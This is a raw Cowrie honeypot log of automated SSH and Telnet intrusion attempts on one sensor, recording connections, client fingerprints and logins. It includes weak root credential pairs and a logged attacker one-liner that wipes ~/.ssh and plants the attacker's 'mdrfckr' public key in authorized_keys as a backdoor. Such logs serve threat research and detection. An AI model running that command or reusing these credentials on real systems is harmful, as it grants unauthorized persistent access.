{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.068895Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.354225Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.355204Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.72","src_port":47100,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ca782c6473a","protocol":"ssh","message":"New connection: 103.31.39.72:47100 (1.2.3.4:22) [session: 3ca782c6473a]","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.630650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.631562Z","src_ip":"103.31.39.72","session":"3ca782c6473a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:20:33.909145Z","src_ip":"103.31.39.72","session":"3ca782c6473a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:20:35.058275Z","src_ip":"103.31.39.72","session":"3ca782c6473a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:36.339021Z","src_ip":"103.31.39.72","session":"3ca782c6473a"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.72","src_port":47102,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e60de71831a","protocol":"ssh","message":"New connection: 103.31.39.72:47102 (1.2.3.4:22) [session: 4e60de71831a]","sensor":"my-vps","timestamp":"2025-08-26T08:20:36.615161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:20:36.615819Z","src_ip":"103.31.39.72","session":"4e60de71831a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:20:36.892169Z","src_ip":"103.31.39.72","session":"4e60de71831a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:20:38.041333Z","src_ip":"103.31.39.72","session":"4e60de71831a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:38.319810Z","src_ip":"103.31.39.72","session":"4e60de71831a"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:38.321131Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44544,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e58d39abcf4","protocol":"ssh","message":"New connection: 212.227.125.160:44544 (1.2.3.4:22) [session: 7e58d39abcf4]","sensor":"my-vps","timestamp":"2025-08-26T08:21:45.727590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:21:45.733335Z","src_ip":"212.227.125.160","session":"7e58d39abcf4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T08:21:45.942975Z","src_ip":"212.227.125.160","session":"7e58d39abcf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40916,"dst_ip":"1.2.3.4","dst_port":22,"session":"a60e97270eb3","protocol":"ssh","message":"New connection: 212.227.235.229:40916 (1.2.3.4:22) [session: a60e97270eb3]","sensor":"my-vps","timestamp":"2025-08-26T08:21:46.403761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:21:46.404536Z","src_ip":"212.227.235.229","session":"a60e97270eb3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T08:21:46.616280Z","src_ip":"212.227.235.229","session":"a60e97270eb3"}
{"eventid":"cowrie.session.connect","src_ip":"78.188.87.131","src_port":59664,"dst_ip":"1.2.3.4","dst_port":23,"session":"5fee8542cf81","protocol":"telnet","message":"New connection: 78.188.87.131:59664 (1.2.3.4:23) [session: 5fee8542cf81]","sensor":"my-vps","timestamp":"2025-08-26T08:21:47.098063Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:21:55.734531Z","src_ip":"212.227.125.160","session":"7e58d39abcf4"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:21:56.404929Z","src_ip":"212.227.235.229","session":"a60e97270eb3"}
{"eventid":"cowrie.session.closed","duration":33.906943798065186,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:22:21.004939Z","src_ip":"78.188.87.131","session":"5fee8542cf81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44329,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3c6800be055","protocol":"telnet","message":"New connection: 212.227.125.160:44329 (1.2.3.4:23) [session: e3c6800be055]","sensor":"my-vps","timestamp":"2025-08-26T08:23:55.560480Z"}
{"eventid":"cowrie.session.closed","duration":4.642038106918335,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:24:00.202450Z","src_ip":"212.227.125.160","session":"e3c6800be055"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":14944,"dst_ip":"1.2.3.4","dst_port":22,"session":"7afd596d42b7","protocol":"ssh","message":"New connection: 212.227.125.160:14944 (1.2.3.4:22) [session: 7afd596d42b7]","sensor":"my-vps","timestamp":"2025-08-26T08:25:06.437412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:07.437964Z","src_ip":"212.227.125.160","session":"7afd596d42b7"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-26T08:25:07.438801Z","src_ip":"212.227.125.160","session":"7afd596d42b7"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:13.017034Z","src_ip":"212.227.125.160","session":"7afd596d42b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43644,"dst_ip":"1.2.3.4","dst_port":22,"session":"09f1a6c95ef6","protocol":"ssh","message":"New connection: 212.227.235.229:43644 (1.2.3.4:22) [session: 09f1a6c95ef6]","sensor":"my-vps","timestamp":"2025-08-26T08:25:13.874511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:14.452751Z","src_ip":"212.227.235.229","session":"09f1a6c95ef6"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-26T08:25:14.453621Z","src_ip":"212.227.235.229","session":"09f1a6c95ef6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:16.476604Z","src_ip":"212.227.235.229","session":"09f1a6c95ef6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54574,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7c91e9e9a31","protocol":"ssh","message":"New connection: 212.227.235.229:54574 (1.2.3.4:22) [session: d7c91e9e9a31]","sensor":"my-vps","timestamp":"2025-08-26T08:25:40.946171Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:41.444950Z","src_ip":"212.227.235.229","session":"d7c91e9e9a31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57392,"dst_ip":"1.2.3.4","dst_port":22,"session":"4785f702c5b0","protocol":"ssh","message":"New connection: 212.227.235.229:57392 (1.2.3.4:22) [session: 4785f702c5b0]","sensor":"my-vps","timestamp":"2025-08-26T08:25:41.532257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:42.497373Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:25:42.498245Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:25:44.436074Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:25:45.515924Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:25:45.516619Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":false,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:46.036613Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:46.037678Z","src_ip":"212.227.235.229","session":"4785f702c5b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47976,"dst_ip":"1.2.3.4","dst_port":22,"session":"2378e30cf1de","protocol":"ssh","message":"New connection: 212.227.235.229:47976 (1.2.3.4:22) [session: 2378e30cf1de]","sensor":"my-vps","timestamp":"2025-08-26T08:25:46.170833Z"}
